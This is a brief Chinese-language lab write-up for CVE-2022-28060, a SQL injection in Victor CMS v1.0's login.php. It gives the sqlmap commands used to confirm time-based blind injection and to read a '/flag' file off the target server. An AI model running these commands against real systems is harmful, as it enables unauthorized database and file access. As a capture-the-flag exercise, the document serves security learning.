CVE-2022-28060 Victor CMS v1.0 /includes/login.php 存在sql注入

靶标介绍

Victor CMS v1.0 /includes/login.php 存在sql注入

步骤

1.使用burp抓包，将数据包保存为txt

2.使用sqlmap工具进行探测是否存在注入点。可以看到存在时间盲注，下面就可以用sqlmap爆出相关信息，探测注入点

sqlmap -r 1.txt

3.读取当前服务器上的文件

sqlmap -r 1.txt --file-read "/flag" --dbms Mysql

-r 1.txt：这个选项告诉sqlmap从1.txt这个文件中读取HTTP请求。
--file-read "/flag"：这个选项让sqlmap尝试从目标数据库服务器上读取"/flag"文件。这个行为可能会被视为一种攻击，因为它可能涉及到未经授权的文件访问。
--dbms Mysql：这个选项指定了目标数据库的类型是MySQL。

4.打开flag文件，得到flag